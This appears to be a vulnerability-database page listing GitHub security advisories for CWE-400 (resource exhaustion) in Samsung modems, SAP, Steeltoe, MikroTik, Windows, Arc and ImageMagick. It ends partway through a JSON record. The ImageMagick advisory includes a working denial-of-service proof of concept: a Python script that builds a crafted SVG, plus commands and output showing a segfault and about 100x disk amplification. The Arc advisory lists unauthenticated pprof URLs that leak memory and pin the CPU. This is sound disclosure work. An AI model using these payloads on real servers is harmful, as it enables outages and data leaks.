Common Weakness Enumeration

CWE-400

Discouraged

Uncontrolled Resource Consumption

Abstraction: Class · Status: Draft

The product does not properly control the allocation and maintenance of a limited resource.

5412 vulnerabilities reference this CWE, most recent first.

GHSA-J8JP-C763-RC6R

Vulnerability from github – Published: 2026-04-06 21:31 – Updated: 2026-04-07 15:30
VLAI
Details

An issue was discovered in NAS in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5300, and Modem 5400. Incorrect Handling of a DL NAS Transport packet leads to a Denial of Service.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-54324"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-04-06T19:16:26Z",
    "severity": "HIGH"
  },
  "details": "An issue was discovered in NAS in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5300, and Modem 5400. Incorrect Handling of a DL NAS Transport packet leads to a Denial of Service.",
  "id": "GHSA-j8jp-c763-rc6r",
  "modified": "2026-04-07T15:30:46Z",
  "published": "2026-04-06T21:31:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54324"
    },
    {
      "type": "WEB",
      "url": "https://semiconductor.samsung.com/support/quality-support/product-security-updates"
    },
    {
      "type": "WEB",
      "url": "https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-54324"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-J8M5-M975-227F

Vulnerability from github – Published: 2022-05-24 19:02 – Updated: 2022-06-29 00:00
VLAI
Details

The Integration Builder Framework of SAP Process Integration versions - 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, does not sufficiently validate an XML document uploaded from local source. An attacker can craft a malicious XML which when uploaded and parsed by the application, could lead to Denial-of-service conditions due to consumption of a large amount of system memory, thus highly impacting system availability.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-27617"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-05-11T15:15:00Z",
    "severity": "MODERATE"
  },
  "details": "The Integration Builder Framework of SAP Process Integration versions - 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, does not sufficiently validate an XML document uploaded from local source. An attacker can craft a malicious XML which when uploaded and parsed by the application, could lead to Denial-of-service conditions due to consumption of a large amount of system memory, thus highly impacting system availability.",
  "id": "GHSA-j8m5-m975-227f",
  "modified": "2022-06-29T00:00:49Z",
  "published": "2022-05-24T19:02:05Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-27617"
    },
    {
      "type": "WEB",
      "url": "https://launchpad.support.sap.com/#/notes/3012021"
    },
    {
      "type": "WEB",
      "url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=576094655"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-J8PH-6FXJ-G533

Vulnerability from github – Published: 2026-07-02 20:30 – Updated: 2026-07-02 20:30
VLAI
Summary
Steeltoe.Discovery.Eureka: Unrecognized DataCenterInfo.Name poisons entire registry fetch
Details

Summary

DataCenterInfo.FromJson throws ArgumentException for any name value other than "MyOwn" or "Amazon", despite the Java Eureka specification defining a third valid value: "Netflix". The exception propagates through the entire registry deserialization chain and is swallowed by the periodic cache refresh task, leaving the local service registry permanently empty or stale.

Impact

Any registration with an unrecognized DataCenterInfo.name permanently disables service discovery for every Steeltoe Eureka client connected to the same registry. New clients start with an empty registry and running clients stop refreshing. The outage persists until the triggering registration is removed.

Because "Netflix" is valid in the Java Eureka specification, a Java or Spring service in the same mesh can trigger this unintentionally.

Affected configuration

  • Application uses the Steeltoe Eureka client (EurekaDiscoveryClient).
  • The registry contains at least one registration with a DataCenterInfo.name value other than "MyOwn" or "Amazon".

Mitigations

If an immediate upgrade is not possible, remove any registrations using unsupported DataCenterInfo.name values from the registry. In mixed Java/Spring and Steeltoe environments, audit for the Netflix data center type before deploying Steeltoe Eureka clients.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.1.0"
      },
      "package": {
        "ecosystem": "NuGet",
        "name": "Steeltoe.Discovery.Eureka"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "4.2.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.3.0"
      },
      "package": {
        "ecosystem": "NuGet",
        "name": "Steeltoe.Discovery.Eureka"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.4.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-50196"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-02T20:30:03Z",
    "nvd_published_at": "2026-06-17T22:16:24Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\n`DataCenterInfo.FromJson` throws `ArgumentException` for any `name` value other than `\"MyOwn\"` or `\"Amazon\"`, despite the Java Eureka specification defining a third valid value: `\"Netflix\"`. The exception propagates through the entire registry deserialization chain and is swallowed by the periodic cache refresh task, leaving the local service registry permanently empty or stale.\n\n### Impact\n\nAny registration with an unrecognized `DataCenterInfo.name` permanently disables service discovery for every Steeltoe Eureka client connected to the same registry. New clients start with an empty registry and running clients stop refreshing. The outage persists until the triggering registration is removed.\n\nBecause `\"Netflix\"` is valid in the Java Eureka specification, a Java or Spring service in the same mesh can trigger this unintentionally.\n\n### Affected configuration\n\n- Application uses the Steeltoe Eureka client (`EurekaDiscoveryClient`).\n- The registry contains at least one registration with a `DataCenterInfo.name` value other than `\"MyOwn\"` or `\"Amazon\"`.\n\n### Mitigations\n\nIf an immediate upgrade is not possible, remove any registrations using unsupported `DataCenterInfo.name` values from the registry. In mixed Java/Spring and Steeltoe environments, audit for the `Netflix` data center type before deploying Steeltoe Eureka clients.",
  "id": "GHSA-j8ph-6fxj-g533",
  "modified": "2026-07-02T20:30:03Z",
  "published": "2026-07-02T20:30:03Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/SteeltoeOSS/security-advisories/security/advisories/GHSA-j8ph-6fxj-g533"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-50196"
    },
    {
      "type": "WEB",
      "url": "https://github.com/SteeltoeOSS/Steeltoe/commit/b8ed8557bb595863e4f340051d16b26ba40a75f4"
    },
    {
      "type": "WEB",
      "url": "https://github.com/SteeltoeOSS/Steeltoe/commit/c34a7399e808d0d11dd977460e81df1f2722df28"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/SteeltoeOSS/Steeltoe"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Steeltoe.Discovery.Eureka: Unrecognized DataCenterInfo.Name poisons entire registry fetch"
}

GHSA-J8R5-239V-8HJW

Vulnerability from github – Published: 2022-05-14 03:22 – Updated: 2022-05-14 03:22
VLAI
Details

A vulnerability in MikroTik Version 6.41.4 could allow an unauthenticated remote attacker to exhaust all available CPU and all available RAM by sending a crafted FTP request on port 21 that begins with many '\0' characters, preventing the affected router from accepting new FTP connections. The router will reboot after 10 minutes, logging a "router was rebooted without proper shutdown" message.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-10070"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-04-16T21:29:00Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability in MikroTik Version 6.41.4 could allow an unauthenticated remote attacker to exhaust all available CPU and all available RAM by sending a crafted FTP request on port 21 that begins with many \u0027\\0\u0027 characters, preventing the affected router from accepting new FTP connections. The router will reboot after 10 minutes, logging a \"router was rebooted without proper shutdown\" message.",
  "id": "GHSA-j8r5-239v-8hjw",
  "modified": "2022-05-14T03:22:02Z",
  "published": "2022-05-14T03:22:02Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-10070"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/44450"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/147183/MikroTik-6.41.4-Denial-Of-Service.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-J8WG-8FGF-X8C5

Vulnerability from github – Published: 2024-07-09 18:30 – Updated: 2024-07-09 18:30
VLAI
Details

Windows Line Printer Daemon Service Denial of Service Vulnerability

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-38027"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-07-09T17:15:29Z",
    "severity": "MODERATE"
  },
  "details": "Windows Line Printer Daemon Service Denial of Service Vulnerability",
  "id": "GHSA-j8wg-8fgf-x8c5",
  "modified": "2024-07-09T18:30:51Z",
  "published": "2024-07-09T18:30:51Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-38027"
    },
    {
      "type": "WEB",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38027"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-J93G-RP6M-J32M

Vulnerability from github – Published: 2026-06-11 17:10 – Updated: 2026-06-11 17:10
VLAI
Summary
Arc: Unauthenticated access to Go debug pprof endpoints leaks runtime state and enables CPU-burn DoS
Details

Summary

Arc registers Go's net/http/pprof handlers at /debug/pprof/* via app.Use(pprof.New()) in internal/api/server.go, and /debug/pprof is added to PublicPrefixes in cmd/arc/main.go. The auth middleware short-circuits before the token check on prefix match, so the endpoints are reachable without any authentication.

Impact

Any network-reachable caller (no token required) can:

  • Fetch /debug/pprof/heap — leaks in-memory state: live SQL strings, decoded msgpack records, decompressed request bodies, cached *TokenInfo (the auth cache keys on SHA-256 of the plaintext token at auth.go:543).
  • Fetch /debug/pprof/goroutine?debug=2 — leaks call stacks, identifying internal code paths.
  • Fetch /debug/pprof/profile?seconds=N — pins a CPU core for arbitrary duration. Trivial DoS amplification (one short HTTP request → minutes of server CPU).
  • Fetch /debug/pprof/trace — long-duration execution trace, similar DoS profile.

No authentication, no rate limiting, no resource bound on the seconds parameter.

Patches

https://github.com/Basekick-Labs/arc/releases/tag/v26.06.1

Planned mitigation:

  1. Gate pprof registration behind an env var (ARC_DEBUG_PPROF=1) that defaults to off.
  2. When enabled, bind pprof to a separate localhost-only listener (127.0.0.1:6060 via dedicated net/http server) so it's never reachable from the public API port.
  3. Remove /debug/pprof from PublicPrefixes.
  4. Fix the HasPrefix bug where "/debug/pprofX" matches "/debug/pprof".

Workarounds

  • Block /debug/pprof* at a reverse proxy / load balancer in front of Arc.
  • Restrict Arc's API port to known-trusted networks via firewall rules.
  • Patch the running build: comment out app.Use(pprof.New()) in internal/api/server.go and rebuild.

Credits

Reported by Alex Manson (@NeuroWinter, https://neurowinter.com/) on 2026-05-19.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/basekick-labs/arc"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20260520170331-32a4091fb949"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-48050"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-306",
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-11T17:10:21Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\nArc registers Go\u0027s `net/http/pprof` handlers at `/debug/pprof/*` via `app.Use(pprof.New())` in `internal/api/server.go`, and `/debug/pprof` is added to `PublicPrefixes` in `cmd/arc/main.go`. The auth middleware short-circuits before the token check on prefix match, so the endpoints are reachable without any authentication.\n\n### Impact\n\nAny network-reachable caller (no token required) can:\n\n- Fetch `/debug/pprof/heap` \u2014 leaks in-memory state: live SQL strings, decoded msgpack records, decompressed request bodies, cached `*TokenInfo` (the auth cache keys on SHA-256 of the plaintext token at `auth.go:543`).\n- Fetch `/debug/pprof/goroutine?debug=2` \u2014 leaks call stacks, identifying internal code paths.\n- Fetch `/debug/pprof/profile?seconds=N` \u2014 pins a CPU core for arbitrary duration. Trivial DoS amplification (one short HTTP request \u2192 minutes of server CPU).\n- Fetch `/debug/pprof/trace` \u2014 long-duration execution trace, similar DoS profile.\n\nNo authentication, no rate limiting, no resource bound on the `seconds` parameter.\n\n### Patches\n\nhttps://github.com/Basekick-Labs/arc/releases/tag/v26.06.1\n\nPlanned mitigation:\n\n1. Gate pprof registration behind an env var (`ARC_DEBUG_PPROF=1`) that defaults to off.\n2. When enabled, bind pprof to a separate localhost-only listener (`127.0.0.1:6060` via dedicated `net/http` server) so it\u0027s never reachable from the public API port.\n3. Remove `/debug/pprof` from `PublicPrefixes`.\n4. Fix the `HasPrefix` bug where `\"/debug/pprofX\"` matches `\"/debug/pprof\"`.\n\n### Workarounds\n\n- Block `/debug/pprof*` at a reverse proxy / load balancer in front of Arc.\n- Restrict Arc\u0027s API port to known-trusted networks via firewall rules.\n- Patch the running build: comment out `app.Use(pprof.New())` in `internal/api/server.go` and rebuild.\n\n### Credits\n\nReported by Alex Manson ([@NeuroWinter](https://github.com/NeuroWinter), https://neurowinter.com/) on 2026-05-19.",
  "id": "GHSA-j93g-rp6m-j32m",
  "modified": "2026-06-11T17:10:21Z",
  "published": "2026-06-11T17:10:21Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Basekick-Labs/arc/security/advisories/GHSA-j93g-rp6m-j32m"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Basekick-Labs/arc/commit/32a4091fb949f9cf060cdd804a07f6450dc426a8"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Basekick-Labs/arc"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Basekick-Labs/arc/releases/tag/v26.06.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Arc: Unauthenticated access to Go debug pprof endpoints leaks runtime state and enables CPU-burn DoS"
}

GHSA-J96M-MJP6-99XR

Vulnerability from github – Published: 2026-03-12 20:30 – Updated: 2026-03-12 20:30
VLAI
Summary
ImageMagick: Specially crafted SVG leads to segmentation fault and generate trash files in "/tmp", possible to leverage DoS
Details

Summary

Specially crafted SVG file make segmentation fault and generate trash files in "/tmp", possible to leverage DoS.

Operating system, version and so on

Linux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara)

Tested ImageMagick version

6.9.11-60, 7.1.0-62

Details

A specially created SVG file that loads by itself and make segmentation fault. Remote attackers can take advantage of this vulnerability to cause a denial of service of the generated SVG file.

It seems that this error affects a lot of websites and causes a generating trash files in /tmp when uploading this PC file to the server.

I think it's better to check the file descriptor coming from itself before executing read().

PoC

  1. Generate SVG file: ```

2. Run some commands for verification:
```$rm -f /tmp/*
$./magick --version
Version: ImageMagick 7.1.0-62 Q16-HDRI x86_64 74b3683a4:20230211 https://imagemagick.org
Copyright: (C) 1999 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5) 
Delegates (built-in): bzlib djvu fontconfig freetype jbig jng jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib
Compiler: gcc (7.5)
$./magick convert -verbose -font OpenSymbol bad.svg t.jpg
'inkscape' '/tmp/magick-ixX13JwrwrLUhyucKsGxechsQtEN4Zji' --export-filename='/tmp/magick-qp154V6U-dyAwtU-QbcnWD8XKFcG7q5k.png' --export-dpi='96' --export-background='rgb(100%,100%,100%)' --export-background-opacity='1' > '/tmp/magick-YWdlPJt-_9BfRq0uY2vmza_VOxWfjyvl' 2>&1
Segmentation fault
$ls /tmp
magick-1iZstE-dzlzQTN4HkWX_JlakXXtH4IEM  magick-GeFwj8Be_wISDLJnsr4s5WC7p079pzXN  magick-s7QN2tTaiXEr9KmkbkHdmtfmgrnjFRaM
magick-1LG0ND-RZMQOG8xizDHd-qdd6_Fu70YP  magick-ggORXwnSivWesH2gthhafuLTVw7TLqwP  magick-s835rBXZIGK5bkp3ijKoMTCbcyWza3ON
magick-25byX_oEeEr2dWIkr9nyEoVz1MHC2n9M  magick-GrRg60fY1LOv4uUhqD16AaEcL6rWtNeN  magick-siS7QS_av31X63ENYmecytIjx1iKmWAN
magick-2Dj7LuLUHF6Y93mZ9ZT8a5taf7b5Hb9O  magick-gTQUBafZIaI1n8q-QXOwOvyc6qv3tolN  magick-SIXvVjWVvDhX1w5NL9K6owJtO0CgG3NN
magick-2GrJuPlQjwGwsTK8I1aTMxg90h8PeK4M  magick-hik3AU_2x0D_R8ViIBXUIuRljCXSmgqO  magick-sJhO2Yv_aeKsxt1JxDENKIiQqkOkSfwM
magick-2QIFnR9e-fYRFevd1-vQ-bSk0I1VOAsO  magick-HJ18uyG3HLvEftNcMqCEJ5LKwi12CQgO  magick-SNgGdhyKjp5TZZQmWqioLEcyQ8vMzG3O
magick-2rEueYW0PIXGxE1zHm3LsGedMW2KLdgP  magick-hUaNDJgYfzTzJes4QlnLwaYh2fcaOWgQ  magick-SxLBCSdKVHSQOrjohe4WFyLHaPOyDUiP
magick-2uRqbAjqkXXMMGQHpw8WG18lnDHaRd3N  magick-_HWqrSdj_ihWMzjJ_eRiAkKbgrIljhUM  magick-t02HQvZSsYLzmJesC2Mpjp5OL3zN4A5P
magick-3dPT4h0HzM6ZqCwpGEB69e27pZhHbfHP  magick-iEMFbMc2VvGj067miVskUC-mxOveGpqO  magick-T4kTJGu-6wF60OOIHOB5tKO63NW5qTTL
magick-3SVSiI4Yg_eQ01ZZV8lZsBM_MhauuwpO  magick-InCjmKQ7uSGizlJFOZz9Vo3Ax1yvLy5L  magick-TGIY7l3-dNVdAbGaMIbN0z3YGy5mrNvM
magick-3WQIQghdu9-YHVasNASfkkU63yyVdmfO  magick-IPu9YWX3Lk96EkP63KLqQ-CX6020cZMN  magick-Thg6M-CqdcXc0SyjRdYm19rtVBLt2U6P
magick-4hLf4JPIes67QpGP7GfmOPftGvENC1aN  magick-IVKuPYBpBe6Lx9F3lLMAMCjIptMoz0ZM  magick-TiTtPZdT3Zgsd-pasyRFTb-DbLGNqJTO
magick-4tTMAJrCHh2E8M1xw5BIjx8UDyb42FWM  magick-IVzovwQiOR2fwJDO5E5RZb58apCPBX8M  magick-_TQZIwyyLufZWMVx1-k3YLSYSsGl6upM
magick-4xs5mqt95PYGrXXxZiwyYHFKREC0NEWL  magick-J36psEABfkKfgVQdeFsptbkRWT0b1uNP  magick-tzMg0NWi-_GQOzES2aPMPRqCk-bgjyVN
magick-5DmloHI-m-WPROyfQmm5cF8GOEVa5EqO  magick-jEq-Q6t6D3CU-eevjhgfjU_LPP3pOEoO  magick-ULNarZD53mUqpJrHZVeZw5x0cuUH683N
magick-5JvQUY2vVq_kpzhfUTcsxao_YB2WImZN  magick-jNiokVz_0Iifz5QX3a9AUIUOBoxfJ49P  magick-uLR13qPG6X-c3avLRypLJ-C7-UiUH9tM
magick-5NoXNg55Xyh8816ksKEcqreuN1BF93LO  magick-jwa4IVvrxrE4OTSA0m8iB2W3K5LiinmQ  magick-uW9khwJZfM4EH1cETVDv09QnueONQGPP
magick-60BRKi88--TOk-Sp8t5nAyAxjSuOpxfO  magick-K5mhLUCkx0WJxcWr7G7oT0nNrc5qBvgQ  magick-v4l3nLHBXBjCNc-nTHSTwUOEfsNCUMnP
magick-6t2qB_JnplYLZZo5thj6PV0R15LrPe4L  magick-K5qzx3k8-36H5wfEgl3Jy1oNpOyscHhN  magick-v7Xm_e5JIf4lCC_CwXJkIuQNHEE7D1LM
magick-6_UmuyWO8OviaajA92_VeD1bK8z0btAO  magick-K6-l4o2PkC4V7Nq_IJ9y-ifJLl6lSzdM  magick-vd7xpM8OrXvu3Oftqd7xdRmGDdoGcHrP
magick-725dkkTfpkfKmogI4WLWWwCbrxc0aysP  magick-KchLIwf4-ahsUq1FsJfK58j3Jb6CAMTP  magick-VhfNmWGF-AOhytm1DMGG8n1DLOAG3p1N
magick-7rZG_PFyH2Q7ibxFrB4kTQZjkihhU9uO  magick-kpcUuOTI4UlrK8kHoZh38ziLMmBjtjvO  magick-vHp_Pz6BixbqmYCq_D2zs2sU4hFRbQoP
magick--7T1tmKSEJSSPJIgeDEQ9PLdo8oPh60P  magick-kReWGvubeCrLdw4RcRsJdJhlV43wCffM  magick-VLoWnTJppgO7-ivh0q_uuGcgPDkuyKPN
magick-8jBguKQr6qeZTsw4eFbQWO34ndlsBpbO  magick-LBjQNSTFFpLRnj3Cldvjm5e_PWYL1fLL  magick-Vp_vOIJK-XsFRZeAS1ZJ9Ra2vkgJbCOL
magick-9Hno6LBapbL0jw_CSEC7Ua6A7kB3uYiN  magick-Lfu-5C1697AwNxTZnljfR24E2_7ZDnwP  magick-VpzT9KMjKbomi6mV3ZnnRkoq1WAP41vM
magick-9SN2401usIEYCc6zcn442pdvqyVdPWaQ  magick-lHxUfKDHYSfpVi7yOc31u7gJVTXLhSuN  magick-vRG2_rcf6I8lB2MJF6DqHqh2_z21IP5N
magick-a1uVHLsbEnA8yXKvwmW3PWAFBdnfoSnQ  magick-M4mcsykxHPNkFTDgc4tdJ9kP1Trkm64M  magick-vw2VNrClFVhnXLqVoIz35Xpo232qsngN
magick-AbpJUZcspor3bkYr70l17bGSjntyAhZP  magick-m5P0dZWaFUeZo4kr8HcO6vpfuICmmBcM  magick-WEYdL0amRHxeCpuGiFEuulRwwzkjZyXO
magick-Acsy_QEmT-x7nE6DvfIv2pqjLbfJYTtN  magick-MHI0zAFGR1-ljbFLl12i5hFVpkoBbdpN  magick-WKjEe_jTF4V6Jt_kCbFEy2B6kQcyFseQ
magick-Ai76_QfTBT0DXjGqvZ_aAGia_gvAxuGM  magick-mOckd_uEYCLc9gy1XwVgtJWpr1aDU7QP  magick-WkkwqgsnNNSleWlRm-1BN8RiE-QcF9lO
magick-albf_l7tU2ASh6PRhnMWBDscz31fS1BO  magick-MrajCpsti_3MlAWlNviDCY3iUeZsgGLM  magick-WMlxV7rdjtMYe1F0aggQZW2WNpvhY2GO
magick-A-nsLcvOOBlHzdBGQMSsdTrvsfUevEQO  magick-mZyca0hC8atGLvY-m0UYec1yCU3rGIWM  magick-wnqAodNT7ZVbe8dIN-Gd2pxCNo6cwzOL
magick-AplCAOC7_K6cDM3qO3wqSONMhVuztohO  magick-NAH0CgD3XCLMS1VN_-4yju-2RCdFJbGO  magick-wP3Q3aM05wB2K6NBolzm6sC_R3b5wE1P
magick-ApNw8tmuaXUw-mqdMF7P0ZKOV3YHwQGM  magick-NU3oGX5NxUhJvWQ_WWY8-7BNAnHWJceM  magick-wsCa-R-K6HYtZ7FWWnPg3FpOyGmS1wuO
magick-AWye85xaEc_t6rGB9bIvIz9BBhrRyg3O  magick-NZBKgJGx7bH8uZ2PiKF8jtzCI9aBDVZN  magick-WvNjMMQ2gXHSGNWCMceMqBL8ksnGZIuO
magick-aXtmFaHIdz24xjFvCy4ZQda2wef0AH0N  magick-o3FerPGSptnb0U5mHu6DH-00ZTlTlDCO  magick-xAPfisi5E9NHJKbkrbCGioXCkTs3uDYM
magick-B5uiXH3Mrf0GgmF9NAPwqSJd-lMFLfrM  magick-o4Dl5iYn3veI54-lNtHgm6wnAIQ79urP  magick-Xb2irJZuxzYWsCfmYHc8oaKU67ANR27N
magick-BEr6_VZecWKFCRVuSXPEIbJu6uuBe0pO  magick-o9S5taGlSrED8zUEtv0EkpjoWk61fJBO  magick-Xkes-Q_QqXhMthGwFKxLjpRvL96qRd6O
magick-bKCtVcSkQqtXdjO8X_AyWeocMsYuZArN  magick-OeHngPf0pRuDH9DpIs_OpkoAbDnAvBTL  magick-xlhsal9kyY6QMOSb1WmyTx1vGTqE94bO
magick-Btw2-hfTAVQLiPRMXakrXs_UhstT2ZGM  magick-OhD82cIFbY91zGxpIt52AbjWekddAU2L  magick-xmmr39PvOExl0B8w0YO_oq2_yYyWoVLM
magick-By2_pnDUxk85bO3M7kkMbAEXHGShyc0O  magick-OlcHbZjE_-66xMyWVlhfAucxYJioiQ4L  magick-xq9qw9wK-TRFokBTostne36jQXljCa7M
...

Impact

Possible DOS, because when ImageMagick crashes it generates a lot of trash files. This trash file can be large, if SVG file contains many render action.

Additional impact

In DOS attack if remount attacker uploads an SVG file of size t, ImageMagick generates files of size 103*t. This means that if an attacker uploads a 100 M SVG, the server will generate about 10 G.

Example:

$cat dos_poc.py 
open("bad_dos.svg", "w").write("""<?xml version="1.0"?>
<?xml-stylesheet href="https://example.com/style.xsl" type="text/xsl" ?>
<!DOCTYPE test>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<image height="200" width="200" href="bad_dos.svg&quot;""" + "0"*(1024*1021) +  """&quot;" />
</svg>""")
$rm -rf /tmp/magick-*
$python3 dos_poc.py
$du -h bad_dos.svg
1,0M    bad_dos.svg
$../magick convert -font OpenSymbol bad_dos.svg t.jpg 
Segmentation fault
$cat /tmp/magick-* > dos_k.txt
$du -h dos_k.txt 
103M    dos_k.txt

P. S. If ImageMagick will work in Docker container this attack will crash server where docker running. Because the size of the docker container will increase.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 12.3.0"
      },
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-AnyCPU"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "13.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 12.3.0"
      },
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-HDRI-AnyCPU"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "13.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 12.3.0"
      },
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-HDRI-OpenMP-arm64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "13.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 12.3.0"
      },
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-HDRI-arm64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "13.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 12.3.0"
      },
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-HDRI-x64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "13.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 12.3.0"
      },
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-HDRI-x86"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "13.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 12.3.0"
      },
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-OpenMP-arm64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "13.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 12.3.0"
      },
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-OpenMP-x64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "13.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
